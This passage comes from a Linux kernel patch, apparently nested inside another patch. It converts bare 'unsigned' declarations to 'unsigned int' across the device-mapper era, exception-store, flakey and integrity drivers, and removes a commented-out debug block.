++	unsigned int b, e = min(d->current_bit + INSERTS_PER_STEP, d->nr_bits);
+ 
+ 	for (b = d->current_bit; b < e; b++) {
+ 		r = writeset_marked_on_disk(&d->info, &d->writeset, b, &marked);
+@@ -1439,7 +1439,7 @@ static bool valid_block_size(dm_block_t block_size)
+ /*
+  * <metadata dev> <data dev> <data block size (sectors)>
+  */
+-static int era_ctr(struct dm_target *ti, unsigned argc, char **argv)
++static int era_ctr(struct dm_target *ti, unsigned int argc, char **argv)
+ {
+ 	int r;
+ 	char dummy;
+@@ -1618,7 +1618,7 @@ static int era_preresume(struct dm_target *ti)
+  * <current era> <held metadata root | '-'>
+  */
+ static void era_status(struct dm_target *ti, status_type_t type,
+-		       unsigned status_flags, char *result, unsigned maxlen)
++		       unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	int r;
+ 	struct era *era = ti->private;
+@@ -1633,10 +1633,10 @@ static void era_status(struct dm_target *ti, status_type_t type,
+ 			goto err;
+ 
+ 		DMEMIT("%u %llu/%llu %u",
+-		       (unsigned) (DM_ERA_METADATA_BLOCK_SIZE >> SECTOR_SHIFT),
++		       (unsigned int) (DM_ERA_METADATA_BLOCK_SIZE >> SECTOR_SHIFT),
+ 		       (unsigned long long) stats.used,
+ 		       (unsigned long long) stats.total,
+-		       (unsigned) stats.era);
++		       (unsigned int) stats.era);
+ 
+ 		if (stats.snap != SUPERBLOCK_LOCATION)
+ 			DMEMIT(" %llu", stats.snap);
+@@ -1662,8 +1662,8 @@ err:
+ 	DMEMIT("Error");
+ }
+ 
+-static int era_message(struct dm_target *ti, unsigned argc, char **argv,
+-		       char *result, unsigned maxlen)
++static int era_message(struct dm_target *ti, unsigned int argc, char **argv,
++		       char *result, unsigned int maxlen)
+ {
+ 	struct era *era = ti->private;
+ 
+diff --git a/drivers/md/dm-exception-store.c b/drivers/md/dm-exception-store.c
+index 3997f34cfebc6..cc3987c97eb94 100644
+--- a/drivers/md/dm-exception-store.c
++++ b/drivers/md/dm-exception-store.c
+@@ -142,7 +142,7 @@ EXPORT_SYMBOL(dm_exception_store_type_unregister);
+ static int set_chunk_size(struct dm_exception_store *store,
+ 			  const char *chunk_size_arg, char **error)
+ {
+-	unsigned chunk_size;
++	unsigned int chunk_size;
+ 
+ 	if (kstrtouint(chunk_size_arg, 10, &chunk_size)) {
+ 		*error = "Invalid chunk size";
+@@ -158,7 +158,7 @@ static int set_chunk_size(struct dm_exception_store *store,
+ }
+ 
+ int dm_exception_store_set_chunk_size(struct dm_exception_store *store,
+-				      unsigned chunk_size,
++				      unsigned int chunk_size,
+ 				      char **error)
+ {
+ 	/* Check chunk_size is a power of 2 */
+@@ -190,7 +190,7 @@ int dm_exception_store_set_chunk_size(struct dm_exception_store *store,
+ 
+ int dm_exception_store_create(struct dm_target *ti, int argc, char **argv,
+ 			      struct dm_snapshot *snap,
+-			      unsigned *args_used,
++			      unsigned int *args_used,
+ 			      struct dm_exception_store **store)
+ {
+ 	int r = 0;
+diff --git a/drivers/md/dm-exception-store.h b/drivers/md/dm-exception-store.h
+index b5f20eba36415..862df68a7db04 100644
+--- a/drivers/md/dm-exception-store.h
++++ b/drivers/md/dm-exception-store.h
+@@ -96,9 +96,9 @@ struct dm_exception_store_type {
+ 	 */
+ 	void (*drop_snapshot) (struct dm_exception_store *store);
+ 
+-	unsigned (*status) (struct dm_exception_store *store,
+-			    status_type_t status, char *result,
+-			    unsigned maxlen);
++	unsigned int (*status) (struct dm_exception_store *store,
++				status_type_t status, char *result,
++				unsigned int maxlen);
+ 
+ 	/*
+ 	 * Return how full the snapshot is.
+@@ -118,9 +118,9 @@ struct dm_exception_store {
+ 	struct dm_snapshot *snap;
+ 
+ 	/* Size of data blocks saved - must be a power of 2 */
+-	unsigned chunk_size;
+-	unsigned chunk_mask;
+-	unsigned chunk_shift;
++	unsigned int chunk_size;
++	unsigned int chunk_mask;
++	unsigned int chunk_shift;
+ 
+ 	void *context;
+ 
+@@ -144,7 +144,7 @@ static inline chunk_t dm_chunk_number(chunk_t chunk)
+ 	return chunk & (chunk_t)((1ULL << DM_CHUNK_NUMBER_BITS) - 1ULL);
+ }
+ 
+-static inline unsigned dm_consecutive_chunk_count(struct dm_exception *e)
++static inline unsigned int dm_consecutive_chunk_count(struct dm_exception *e)
+ {
+ 	return e->new_chunk >> DM_CHUNK_NUMBER_BITS;
+ }
+@@ -181,12 +181,12 @@ int dm_exception_store_type_register(struct dm_exception_store_type *type);
+ int dm_exception_store_type_unregister(struct dm_exception_store_type *type);
+ 
+ int dm_exception_store_set_chunk_size(struct dm_exception_store *store,
+-				      unsigned chunk_size,
++				      unsigned int chunk_size,
+ 				      char **error);
+ 
+ int dm_exception_store_create(struct dm_target *ti, int argc, char **argv,
+ 			      struct dm_snapshot *snap,
+-			      unsigned *args_used,
++			      unsigned int *args_used,
+ 			      struct dm_exception_store **store);
+ void dm_exception_store_destroy(struct dm_exception_store *store);
+ 
+diff --git a/drivers/md/dm-flakey.c b/drivers/md/dm-flakey.c
+index 335684a1aeaa5..7efbdb42cf3b4 100644
+--- a/drivers/md/dm-flakey.c
++++ b/drivers/md/dm-flakey.c
+@@ -26,12 +26,12 @@ struct flakey_c {
+ 	struct dm_dev *dev;
+ 	unsigned long start_time;
+ 	sector_t start;
+-	unsigned up_interval;
+-	unsigned down_interval;
++	unsigned int up_interval;
++	unsigned int down_interval;
+ 	unsigned long flags;
+-	unsigned corrupt_bio_byte;
+-	unsigned corrupt_bio_rw;
+-	unsigned corrupt_bio_value;
++	unsigned int corrupt_bio_byte;
++	unsigned int corrupt_bio_rw;
++	unsigned int corrupt_bio_value;
+ 	blk_opf_t corrupt_bio_flags;
+ };
+ 
+@@ -48,7 +48,7 @@ static int parse_features(struct dm_arg_set *as, struct flakey_c *fc,
+ 			  struct dm_target *ti)
+ {
+ 	int r;
+-	unsigned argc;
++	unsigned int argc;
+ 	const char *arg_name;
+ 
+ 	static const struct dm_arg _args[] = {
+@@ -148,7 +148,7 @@ static int parse_features(struct dm_arg_set *as, struct flakey_c *fc,
+ 			BUILD_BUG_ON(sizeof(fc->corrupt_bio_flags) !=
+ 				     sizeof(unsigned int));
+ 			r = dm_read_arg(_args + 3, as,
+-				(__force unsigned *)&fc->corrupt_bio_flags,
++				(__force unsigned int *)&fc->corrupt_bio_flags,
+ 				&ti->error);
+ 			if (r)
+ 				return r;
+@@ -324,7 +324,7 @@ static void corrupt_bio_data(struct bio *bio, struct flakey_c *fc)
+ static int flakey_map(struct dm_target *ti, struct bio *bio)
+ {
+ 	struct flakey_c *fc = ti->private;
+-	unsigned elapsed;
++	unsigned int elapsed;
+ 	struct per_bio_data *pb = dm_per_bio_data(bio, sizeof(struct per_bio_data));
+ 	pb->bio_submitted = false;
+ 
+@@ -417,11 +417,11 @@ static int flakey_end_io(struct dm_target *ti, struct bio *bio,
+ }
+ 
+ static void flakey_status(struct dm_target *ti, status_type_t type,
+-			  unsigned status_flags, char *result, unsigned maxlen)
++			  unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+-	unsigned sz = 0;
++	unsigned int sz = 0;
+ 	struct flakey_c *fc = ti->private;
+-	unsigned drop_writes, error_writes;
++	unsigned int drop_writes, error_writes;
+ 
+ 	switch (type) {
+ 	case STATUSTYPE_INFO:
+diff --git a/drivers/md/dm-integrity.c b/drivers/md/dm-integrity.c
+index 1388ee35571e0..53f9f765df9fd 100644
+--- a/drivers/md/dm-integrity.c
++++ b/drivers/md/dm-integrity.c
+@@ -157,13 +157,13 @@ struct alg_spec {
+ 	char *alg_string;
+ 	char *key_string;
+ 	__u8 *key;
+-	unsigned key_size;
++	unsigned int key_size;
+ };
+ 
+ struct dm_integrity_c {
+ 	struct dm_dev *dev;
+ 	struct dm_dev *meta_dev;
+-	unsigned tag_size;
++	unsigned int tag_size;
+ 	__s8 log2_tag_size;
+ 	sector_t start;
+ 	mempool_t journal_io_mempool;
+@@ -171,8 +171,8 @@ struct dm_integrity_c {
+ 	struct dm_bufio_client *bufio;
+ 	struct workqueue_struct *metadata_wq;
+ 	struct superblock *sb;
+-	unsigned journal_pages;
+-	unsigned n_bitmap_blocks;
++	unsigned int journal_pages;
++	unsigned int n_bitmap_blocks;
+ 
+ 	struct page_list *journal;
+ 	struct page_list *journal_io;
+@@ -180,7 +180,7 @@ struct dm_integrity_c {
+ 	struct page_list *recalc_bitmap;
+ 	struct page_list *may_write_bitmap;
+ 	struct bitmap_block_status *bbs;
+-	unsigned bitmap_flush_interval;
++	unsigned int bitmap_flush_interval;
+ 	int synchronous_mode;
+ 	struct bio_list synchronous_bios;
+ 	struct delayed_work bitmap_flush_work;
+@@ -201,12 +201,12 @@ struct dm_integrity_c {
+ 	unsigned char journal_entries_per_sector;
+ 	unsigned char journal_section_entries;
+ 	unsigned short journal_section_sectors;
+-	unsigned journal_sections;
+-	unsigned journal_entries;
++	unsigned int journal_sections;
++	unsigned int journal_entries;
+ 	sector_t data_device_sectors;
+ 	sector_t meta_device_sectors;
+-	unsigned initial_sectors;
+-	unsigned metadata_run;
++	unsigned int initial_sectors;
++	unsigned int metadata_run;
+ 	__s8 log2_metadata_run;
+ 	__u8 log2_buffer_sectors;
+ 	__u8 sectors_per_block;
+@@ -230,17 +230,17 @@ struct dm_integrity_c {
+ 	unsigned char commit_seq;
+ 	commit_id_t commit_ids[N_COMMIT_IDS];
+ 
+-	unsigned committed_section;
+-	unsigned n_committed_sections;
++	unsigned int committed_section;
++	unsigned int n_committed_sections;
+ 
+-	unsigned uncommitted_section;
+-	unsigned n_uncommitted_sections;
++	unsigned int uncommitted_section;
++	unsigned int n_uncommitted_sections;
+ 
+-	unsigned free_section;
++	unsigned int free_section;
+ 	unsigned char free_section_entry;
+-	unsigned free_sectors;
++	unsigned int free_sectors;
+ 
+-	unsigned free_sectors_threshold;
++	unsigned int free_sectors_threshold;
+ 
+ 	struct workqueue_struct *commit_wq;
+ 	struct work_struct commit_work;
+@@ -257,7 +257,7 @@ struct dm_integrity_c {
+ 
+ 	unsigned long autocommit_jiffies;
+ 	struct timer_list autocommit_timer;
+-	unsigned autocommit_msec;
++	unsigned int autocommit_msec;
+ 
+ 	wait_queue_head_t copy_to_journal_wait;
+ 
+@@ -305,7 +305,7 @@ struct dm_integrity_io {
+ 	struct dm_integrity_range range;
+ 
+ 	sector_t metadata_block;
+-	unsigned metadata_offset;
++	unsigned int metadata_offset;
+ 
+ 	atomic_t in_flight;
+ 	blk_status_t bi_status;
+@@ -329,7 +329,7 @@ struct journal_io {
+ struct bitmap_block_status {
+ 	struct work_struct work;
+ 	struct dm_integrity_c *ic;
+-	unsigned idx;
++	unsigned int idx;
+ 	unsigned long *bitmap;
+ 	struct bio_list bio_queue;
+ 	spinlock_t bio_queue_lock;
+@@ -410,8 +410,8 @@ static bool dm_integrity_disable_recalculate(struct dm_integrity_c *ic)
+ 	return false;
+ }
+ 
+-static commit_id_t dm_integrity_commit_id(struct dm_integrity_c *ic, unsigned i,
+-					  unsigned j, unsigned char seq)
++static commit_id_t dm_integrity_commit_id(struct dm_integrity_c *ic, unsigned int i,
++					  unsigned int j, unsigned char seq)
+ {
+ 	/*
+ 	 * Xor the number with section and sector, so that if a piece of
+@@ -426,7 +426,7 @@ static void get_area_and_offset(struct dm_integrity_c *ic, sector_t data_sector,
+ 	if (!ic->meta_dev) {
+ 		__u8 log2_interleave_sectors = ic->sb->log2_interleave_sectors;
+ 		*area = data_sector >> log2_interleave_sectors;
+-		*offset = (unsigned)data_sector & ((1U << log2_interleave_sectors) - 1);
++		*offset = (unsigned int)data_sector & ((1U << log2_interleave_sectors) - 1);
+ 	} else {
+ 		*area = 0;
+ 		*offset = data_sector;
+@@ -435,15 +435,15 @@ static void get_area_and_offset(struct dm_integrity_c *ic, sector_t data_sector,
+ 
+ #define sector_to_block(ic, n)						\
+ do {									\
+-	BUG_ON((n) & (unsigned)((ic)->sectors_per_block - 1));		\
++	BUG_ON((n) & (unsigned int)((ic)->sectors_per_block - 1));		\
+ 	(n) >>= (ic)->sb->log2_sectors_per_block;			\
+ } while (0)
+ 
+ static __u64 get_metadata_sector_and_offset(struct dm_integrity_c *ic, sector_t area,
+-					    sector_t offset, unsigned *metadata_offset)
++					    sector_t offset, unsigned int *metadata_offset)
+ {
+ 	__u64 ms;
+-	unsigned mo;
++	unsigned int mo;
+ 
+ 	ms = area << ic->sb->log2_interleave_sectors;
+ 	if (likely(ic->log2_metadata_run >= 0))
+@@ -484,7 +484,7 @@ static sector_t get_data_sector(struct dm_integrity_c *ic, sector_t area, sector
+ 	return result;
+ }
+ 
+-static void wraparound_section(struct dm_integrity_c *ic, unsigned *sec_ptr)
++static void wraparound_section(struct dm_integrity_c *ic, unsigned int *sec_ptr)
+ {
+ 	if (unlikely(*sec_ptr >= ic->journal_sections))
+ 		*sec_ptr -= ic->journal_sections;
+@@ -508,7 +508,7 @@ static int sb_mac(struct dm_integrity_c *ic, bool wr)
+ {
+ 	SHASH_DESC_ON_STACK(desc, ic->journal_mac);
+ 	int r;
+-	unsigned size = crypto_shash_digestsize(ic->journal_mac);
++	unsigned int size = crypto_shash_digestsize(ic->journal_mac);
+ 
+ 	if (sizeof(struct superblock) + size > 1 << SECTOR_SHIFT) {
+ 		dm_integrity_io_error(ic, "digest is too long", -EINVAL);
+@@ -704,8 +704,8 @@ repeat:
+ 
+ static void block_bitmap_copy(struct dm_integrity_c *ic, struct page_list *dst, struct page_list *src)
+ {
+-	unsigned n_bitmap_pages = DIV_ROUND_UP(ic->n_bitmap_blocks, PAGE_SIZE / BITMAP_BLOCK_SIZE);
+-	unsigned i;
++	unsigned int n_bitmap_pages = DIV_ROUND_UP(ic->n_bitmap_blocks, PAGE_SIZE / BITMAP_BLOCK_SIZE);
++	unsigned int i;
+ 
+ 	for (i = 0; i < n_bitmap_pages; i++) {
+ 		unsigned long *dst_data = lowmem_page_address(dst[i].page);
+@@ -716,18 +716,18 @@ static void block_bitmap_copy(struct dm_integrity_c *ic, struct page_list *dst,
+ 
+ static struct bitmap_block_status *sector_to_bitmap_block(struct dm_integrity_c *ic, sector_t sector)
+ {
+-	unsigned bit = sector >> (ic->sb->log2_sectors_per_block + ic->log2_blocks_per_bitmap_bit);
+-	unsigned bitmap_block = bit / (BITMAP_BLOCK_SIZE * 8);
++	unsigned int bit = sector >> (ic->sb->log2_sectors_per_block + ic->log2_blocks_per_bitmap_bit);
++	unsigned int bitmap_block = bit / (BITMAP_BLOCK_SIZE * 8);
+ 
+ 	BUG_ON(bitmap_block >= ic->n_bitmap_blocks);
+ 	return &ic->bbs[bitmap_block];
+ }
+ 
+-static void access_journal_check(struct dm_integrity_c *ic, unsigned section, unsigned offset,
++static void access_journal_check(struct dm_integrity_c *ic, unsigned int section, unsigned int offset,
+ 				 bool e, const char *function)
+ {
+ #if defined(CONFIG_DM_DEBUG) || defined(INTERNAL_VERIFY)
+-	unsigned limit = e ? ic->journal_section_entries : ic->journal_section_sectors;
++	unsigned int limit = e ? ic->journal_section_entries : ic->journal_section_sectors;
+ 
+ 	if (unlikely(section >= ic->journal_sections) ||
+ 	    unlikely(offset >= limit)) {
+@@ -738,10 +738,10 @@ static void access_journal_check(struct dm_integrity_c *ic, unsigned section, un
+ #endif
+ }
+ 
+-static void page_list_location(struct dm_integrity_c *ic, unsigned section, unsigned offset,
+-			       unsigned *pl_index, unsigned *pl_offset)
++static void page_list_location(struct dm_integrity_c *ic, unsigned int section, unsigned int offset,
++			       unsigned int *pl_index, unsigned int *pl_offset)
+ {
+-	unsigned sector;
++	unsigned int sector;
+ 
+ 	access_journal_check(ic, section, offset, false, "page_list_location");
+ 
+@@ -752,9 +752,9 @@ static void page_list_location(struct dm_integrity_c *ic, unsigned section, unsi
+ }
+ 
+ static struct journal_sector *access_page_list(struct dm_integrity_c *ic, struct page_list *pl,
+-					       unsigned section, unsigned offset, unsigned *n_sectors)
++					       unsigned int section, unsigned int offset, unsigned int *n_sectors)
+ {
+-	unsigned pl_index, pl_offset;
++	unsigned int pl_index, pl_offset;
+ 	char *va;
+ 
+ 	page_list_location(ic, section, offset, &pl_index, &pl_offset);
+@@ -767,14 +767,14 @@ static struct journal_sector *access_page_list(struct dm_integrity_c *ic, struct
+ 	return (struct journal_sector *)(va + pl_offset);
+ }
+ 
+-static struct journal_sector *access_journal(struct dm_integrity_c *ic, unsigned section, unsigned offset)
++static struct journal_sector *access_journal(struct dm_integrity_c *ic, unsigned int section, unsigned int offset)
+ {
+ 	return access_page_list(ic, ic->journal, section, offset, NULL);
+ }
+ 
+-static struct journal_entry *access_journal_entry(struct dm_integrity_c *ic, unsigned section, unsigned n)
++static struct journal_entry *access_journal_entry(struct dm_integrity_c *ic, unsigned int section, unsigned int n)
+ {
+-	unsigned rel_sector, offset;
++	unsigned int rel_sector, offset;
+ 	struct journal_sector *js;
+ 
+ 	access_journal_check(ic, section, n, true, "access_journal_entry");
+@@ -786,7 +786,7 @@ static struct journal_entry *access_journal_entry(struct dm_integrity_c *ic, uns
+ 	return (struct journal_entry *)((char *)js + offset * ic->journal_entry_size);
+ }
+ 
+-static struct journal_sector *access_journal_data(struct dm_integrity_c *ic, unsigned section, unsigned n)
++static struct journal_sector *access_journal_data(struct dm_integrity_c *ic, unsigned int section, unsigned int n)
+ {
+ 	n <<= ic->sb->log2_sectors_per_block;
+ 
+@@ -797,11 +797,11 @@ static struct journal_sector *access_journal_data(struct dm_integrity_c *ic, uns
+ 	return access_journal(ic, section, n);
+ }
+ 
+-static void section_mac(struct dm_integrity_c *ic, unsigned section, __u8 result[JOURNAL_MAC_SIZE])
++static void section_mac(struct dm_integrity_c *ic, unsigned int section, __u8 result[JOURNAL_MAC_SIZE])
+ {
+ 	SHASH_DESC_ON_STACK(desc, ic->journal_mac);
+ 	int r;
+-	unsigned j, size;
++	unsigned int j, size;
+ 
+ 	desc->tfm = ic->journal_mac;
+ 
+@@ -866,10 +866,10 @@ err:
+ 	memset(result, 0, JOURNAL_MAC_SIZE);
+ }
+ 
+-static void rw_section_mac(struct dm_integrity_c *ic, unsigned section, bool wr)
++static void rw_section_mac(struct dm_integrity_c *ic, unsigned int section, bool wr)
+ {
+ 	__u8 result[JOURNAL_MAC_SIZE];
+-	unsigned j;
++	unsigned int j;
+ 
+ 	if (!ic->journal_mac)
+ 		return;
+@@ -898,12 +898,12 @@ static void complete_journal_op(void *context)
+ 		complete(&comp->comp);
+ }
+ 
+-static void xor_journal(struct dm_integrity_c *ic, bool encrypt, unsigned section,
+-			unsigned n_sections, struct journal_completion *comp)
++static void xor_journal(struct dm_integrity_c *ic, bool encrypt, unsigned int section,
++			unsigned int n_sections, struct journal_completion *comp)
+ {
+ 	struct async_submit_ctl submit;
+ 	size_t n_bytes = (size_t)(n_sections * ic->journal_section_sectors) << SECTOR_SHIFT;
+-	unsigned pl_index, pl_offset, section_index;
++	unsigned int pl_index, pl_offset, section_index;
+ 	struct page_list *source_pl, *target_pl;
+ 
+ 	if (likely(encrypt)) {
+@@ -928,7 +928,7 @@ static void xor_journal(struct dm_integrity_c *ic, bool encrypt, unsigned sectio
+ 		struct page *dst_page;
+ 
+ 		while (unlikely(pl_index == section_index)) {
+-			unsigned dummy;
++			unsigned int dummy;
+ 			if (likely(encrypt))
+ 				rw_section_mac(ic, section, true);
+ 			section++;
+@@ -990,8 +990,8 @@ static bool do_crypt(bool encrypt, struct skcipher_request *req, struct journal_
+ 	return false;
+ }
+ 
+-static void crypt_journal(struct dm_integrity_c *ic, bool encrypt, unsigned section,
+-			  unsigned n_sections, struct journal_completion *comp)
++static void crypt_journal(struct dm_integrity_c *ic, bool encrypt, unsigned int section,
++			  unsigned int n_sections, struct journal_completion *comp)
+ {
+ 	struct scatterlist **source_sg;
+ 	struct scatterlist **target_sg;
+@@ -1008,7 +1008,7 @@ static void crypt_journal(struct dm_integrity_c *ic, bool encrypt, unsigned sect
+ 
+ 	do {
+ 		struct skcipher_request *req;
+-		unsigned ivsize;
++		unsigned int ivsize;
+ 		char *iv;
+ 
+ 		if (likely(encrypt))
+@@ -1034,8 +1034,8 @@ static void crypt_journal(struct dm_integrity_c *ic, bool encrypt, unsigned sect
+ 	complete_journal_op(comp);
+ }
+ 
+-static void encrypt_journal(struct dm_integrity_c *ic, bool encrypt, unsigned section,
+-			    unsigned n_sections, struct journal_completion *comp)
++static void encrypt_journal(struct dm_integrity_c *ic, bool encrypt, unsigned int section,
++			    unsigned int n_sections, struct journal_completion *comp)
+ {
+ 	if (ic->journal_xor)
+ 		return xor_journal(ic, encrypt, section, n_sections, comp);
+@@ -1052,12 +1052,12 @@ static void complete_journal_io(unsigned long error, void *context)
+ }
+ 
+ static void rw_journal_sectors(struct dm_integrity_c *ic, blk_opf_t opf,
+-			       unsigned sector, unsigned n_sectors,
++			       unsigned int sector, unsigned int n_sectors,
+ 			       struct journal_completion *comp)
+ {
+ 	struct dm_io_request io_req;
+ 	struct dm_io_region io_loc;
+-	unsigned pl_index, pl_offset;
++	unsigned int pl_index, pl_offset;
+ 	int r;
+ 
+ 	if (unlikely(dm_integrity_failed(ic))) {
+@@ -1099,10 +1099,10 @@ static void rw_journal_sectors(struct dm_integrity_c *ic, blk_opf_t opf,
+ }
+ 
+ static void rw_journal(struct dm_integrity_c *ic, blk_opf_t opf,
+-		       unsigned section, unsigned n_sections,
++		       unsigned int section, unsigned int n_sections,
+ 		       struct journal_completion *comp)
+ {
+-	unsigned sector, n_sectors;
++	unsigned int sector, n_sectors;
+ 
+ 	sector = section * ic->journal_section_sectors;
+ 	n_sectors = n_sections * ic->journal_section_sectors;
+@@ -1110,12 +1110,12 @@ static void rw_journal(struct dm_integrity_c *ic, blk_opf_t opf,
+ 	rw_journal_sectors(ic, opf, sector, n_sectors, comp);
+ }
+ 
+-static void write_journal(struct dm_integrity_c *ic, unsigned commit_start, unsigned commit_sections)
++static void write_journal(struct dm_integrity_c *ic, unsigned int commit_start, unsigned int commit_sections)
+ {
+ 	struct journal_completion io_comp;
+ 	struct journal_completion crypt_comp_1;
+ 	struct journal_completion crypt_comp_2;
+-	unsigned i;
++	unsigned int i;
+ 
+ 	io_comp.ic = ic;
+ 	init_completion(&io_comp.comp);
+@@ -1135,7 +1135,7 @@ static void write_journal(struct dm_integrity_c *ic, unsigned commit_start, unsi
+ 		rw_journal(ic, REQ_OP_WRITE | REQ_FUA | REQ_SYNC, commit_start,
+ 			   commit_sections, &io_comp);
+ 	} else {
+-		unsigned to_end;
++		unsigned int to_end;
+ 		io_comp.in_flight = (atomic_t)ATOMIC_INIT(2);
+ 		to_end = ic->journal_sections - commit_start;
+ 		if (ic->journal_io) {
+@@ -1172,15 +1172,15 @@ static void write_journal(struct dm_integrity_c *ic, unsigned commit_start, unsi
+ 	wait_for_completion_io(&io_comp.comp);
+ }
+ 
+-static void copy_from_journal(struct dm_integrity_c *ic, unsigned section, unsigned offset,
+-			      unsigned n_sectors, sector_t target, io_notify_fn fn, void *data)
++static void copy_from_journal(struct dm_integrity_c *ic, unsigned int section, unsigned int offset,
++			      unsigned int n_sectors, sector_t target, io_notify_fn fn, void *data)
+ {
+ 	struct dm_io_request io_req;
+ 	struct dm_io_region io_loc;
+ 	int r;
+-	unsigned sector, pl_index, pl_offset;
++	unsigned int sector, pl_index, pl_offset;
+ 
+-	BUG_ON((target | n_sectors | offset) & (unsigned)(ic->sectors_per_block - 1));
++	BUG_ON((target | n_sectors | offset) & (unsigned int)(ic->sectors_per_block - 1));
+ 
+ 	if (unlikely(dm_integrity_failed(ic))) {
+ 		fn(-1UL, data);
+@@ -1221,7 +1221,7 @@ static bool add_new_range(struct dm_integrity_c *ic, struct dm_integrity_range *
+ 	struct rb_node **n = &ic->in_progress.rb_node;
+ 	struct rb_node *parent;
+ 
+-	BUG_ON((new_range->logical_sector | new_range->n_sectors) & (unsigned)(ic->sectors_per_block - 1));
++	BUG_ON((new_range->logical_sector | new_range->n_sectors) & (unsigned int)(ic->sectors_per_block - 1));
+ 
+ 	if (likely(check_waiting)) {
+ 		struct dm_integrity_range *range;
+@@ -1339,10 +1339,10 @@ static void remove_journal_node(struct dm_integrity_c *ic, struct journal_node *
+ 
+ #define NOT_FOUND	(-1U)
+ 
+-static unsigned find_journal_node(struct dm_integrity_c *ic, sector_t sector, sector_t *next_sector)
++static unsigned int find_journal_node(struct dm_integrity_c *ic, sector_t sector, sector_t *next_sector)
+ {
+ 	struct rb_node *n = ic->journal_tree_root.rb_node;
+-	unsigned found = NOT_FOUND;
++	unsigned int found = NOT_FOUND;
+ 	*next_sector = (sector_t)-1;
+ 	while (n) {
+ 		struct journal_node *j = container_of(n, struct journal_node, node);
+@@ -1360,7 +1360,7 @@ static unsigned find_journal_node(struct dm_integrity_c *ic, sector_t sector, se
+ 	return found;
+ }
+ 
+-static bool test_journal_node(struct dm_integrity_c *ic, unsigned pos, sector_t sector)
++static bool test_journal_node(struct dm_integrity_c *ic, unsigned int pos, sector_t sector)
+ {
+ 	struct journal_node *node, *next_node;
+ 	struct rb_node *next;
+@@ -1385,7 +1385,7 @@ static bool find_newer_committed_node(struct dm_integrity_c *ic, struct journal_
+ {
+ 	struct rb_node *next;
+ 	struct journal_node *next_node;
+-	unsigned next_section;
++	unsigned int next_section;
+ 
+ 	BUG_ON(RB_EMPTY_NODE(&node->node));
+ 
+@@ -1398,7 +1398,7 @@ static bool find_newer_committed_node(struct dm_integrity_c *ic, struct journal_
+ 	if (next_node->sector != node->sector)
+ 		return false;
+ 
+-	next_section = (unsigned)(next_node - ic->journal_tree) / ic->journal_section_entries;
++	next_section = (unsigned int)(next_node - ic->journal_tree) / ic->journal_section_entries;
+ 	if (next_section >= ic->committed_section &&
+ 	    next_section < ic->committed_section + ic->n_committed_sections)
+ 		return true;
+@@ -1413,17 +1413,17 @@ static bool find_newer_committed_node(struct dm_integrity_c *ic, struct journal_
+ #define TAG_CMP		2
+ 
+ static int dm_integrity_rw_tag(struct dm_integrity_c *ic, unsigned char *tag, sector_t *metadata_block,
+-			       unsigned *metadata_offset, unsigned total_size, int op)
++			       unsigned int *metadata_offset, unsigned int total_size, int op)
+ {
+ #define MAY_BE_FILLER		1
+ #define MAY_BE_HASH		2
+-	unsigned hash_offset = 0;
+-	unsigned may_be = MAY_BE_HASH | (ic->discard ? MAY_BE_FILLER : 0);
++	unsigned int hash_offset = 0;
++	unsigned int may_be = MAY_BE_HASH | (ic->discard ? MAY_BE_FILLER : 0);
+ 
+ 	do {
+ 		unsigned char *data, *dp;
+ 		struct dm_buffer *b;
+-		unsigned to_copy;
++		unsigned int to_copy;
+ 		int r;
+ 
+ 		r = dm_integrity_failed(ic);
+@@ -1453,7 +1453,7 @@ static int dm_integrity_rw_tag(struct dm_integrity_c *ic, unsigned char *tag, se
+ 						goto thorough_test;
+ 				}
+ 			} else {
+-				unsigned i, ts;
++				unsigned int i, ts;
+ thorough_test:
+ 				ts = total_size;
+ 
+@@ -1652,7 +1652,7 @@ static void integrity_sector_checksum(struct dm_integrity_c *ic, sector_t sector
+ 	__le64 sector_le = cpu_to_le64(sector);
+ 	SHASH_DESC_ON_STACK(req, ic->internal_hash);
+ 	int r;
+-	unsigned digest_size;
++	unsigned int digest_size;
+ 
+ 	req->tfm = ic->internal_hash;
+ 
+@@ -1709,13 +1709,13 @@ static void integrity_metadata(struct work_struct *w)
+ 	if (ic->internal_hash) {
+ 		struct bvec_iter iter;
+ 		struct bio_vec bv;
+-		unsigned digest_size = crypto_shash_digestsize(ic->internal_hash);
++		unsigned int digest_size = crypto_shash_digestsize(ic->internal_hash);
+ 		struct bio *bio = dm_bio_from_per_bio_data(dio, sizeof(struct dm_integrity_io));
+ 		char *checksums;
+-		unsigned extra_space = unlikely(digest_size > ic->tag_size) ? digest_size - ic->tag_size : 0;
++		unsigned int extra_space = unlikely(digest_size > ic->tag_size) ? digest_size - ic->tag_size : 0;
+ 		char checksums_onstack[max((size_t)HASH_MAX_DIGESTSIZE, MAX_TAG_SIZE)];
+ 		sector_t sector;
+-		unsigned sectors_to_process;
++		unsigned int sectors_to_process;
+ 
+ 		if (unlikely(ic->mode == 'R'))
+ 			goto skip_io;
+@@ -1735,14 +1735,13 @@ static void integrity_metadata(struct work_struct *w)
+ 		}
+ 
+ 		if (unlikely(dio->op == REQ_OP_DISCARD)) {
+-			sector_t bi_sector = dio->bio_details.bi_iter.bi_sector;
+-			unsigned bi_size = dio->bio_details.bi_iter.bi_size;
+-			unsigned max_size = likely(checksums != checksums_onstack) ? PAGE_SIZE : HASH_MAX_DIGESTSIZE;
+-			unsigned max_blocks = max_size / ic->tag_size;
++			unsigned int bi_size = dio->bio_details.bi_iter.bi_size;
++			unsigned int max_size = likely(checksums != checksums_onstack) ? PAGE_SIZE : HASH_MAX_DIGESTSIZE;
++			unsigned int max_blocks = max_size / ic->tag_size;
+ 			memset(checksums, DISCARD_FILLER, max_size);
+ 
+ 			while (bi_size) {
+-				unsigned this_step_blocks = bi_size >> (SECTOR_SHIFT + ic->sb->log2_sectors_per_block);
++				unsigned int this_step_blocks = bi_size >> (SECTOR_SHIFT + ic->sb->log2_sectors_per_block);
+ 				this_step_blocks = min(this_step_blocks, max_blocks);
+ 				r = dm_integrity_rw_tag(ic, checksums, &dio->metadata_block, &dio->metadata_offset,
+ 							this_step_blocks * ic->tag_size, TAG_WRITE);
+@@ -1752,13 +1751,7 @@ static void integrity_metadata(struct work_struct *w)
+ 					goto error;
+ 				}
+ 
+-				/*if (bi_size < this_step_blocks << (SECTOR_SHIFT + ic->sb->log2_sectors_per_block)) {
+-					printk("BUGG: bi_sector: %llx, bi_size: %u\n", bi_sector, bi_size);
+-					printk("BUGG: this_step_blocks: %u\n", this_step_blocks);
+-					BUG();
+-				}*/
